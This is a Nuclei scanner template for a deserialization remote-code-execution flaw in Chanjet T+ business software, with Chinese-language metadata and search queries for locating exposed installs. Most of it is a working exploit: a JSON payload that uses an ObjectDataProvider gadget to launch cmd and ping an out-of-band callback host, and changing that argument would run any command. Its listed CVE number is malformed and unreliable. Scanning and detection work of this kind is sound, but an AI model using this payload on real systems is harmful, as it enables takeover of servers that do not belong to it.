 
id: chanjet-tplus-ajaxpro-rce
 
info:
  name: 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞
  author: k3ppf0r
  severity: critical
  description: |
    T+是用友畅捷通推出的一款新型互联网企业管理系统，T+能够满足成长型小微企业对其灵活业务流程的管控需求，重点解决往来业务管理、订单跟踪、资金、库存等管理难题。用户可以通过各种固定或移动设备随时随地迅速获取企业实时、动态的运营信息。该系统/tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx接口存在反序列化RCE漏洞，会导致主机沦陷。
  reference:
    - https://blog.csdn.net/qq_34780861/article/details/136921246
  remediation: |
    等待官方修复，打对应补丁，重启服务
  classification:
    cve-id: 2024-105141630
    cvss-score: 9.5
    cwe-id: CWE-74
  metadata:
    date: 2024-03-21
    verified: true
    max-request: 1
    version: 畅捷通 T+
    fofa-query: app="畅捷通-TPlus"
    hunter-query: app.name="畅捷通 T+"
  tags: 畅捷通-TPlus
 
http:
  - raw:
      - |
        POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
        Connection: close
        Content-Type: application/json
        
        {
          "storeID": {
            "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
            "MethodName": "Start",
            "ObjectInstance": {
              "__type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
              "StartInfo": {
                "__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
                "FileName": "cmd",
                "Arguments": "/c ping {{interactsh-url}}"
              }
            }
          }
        }
 
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"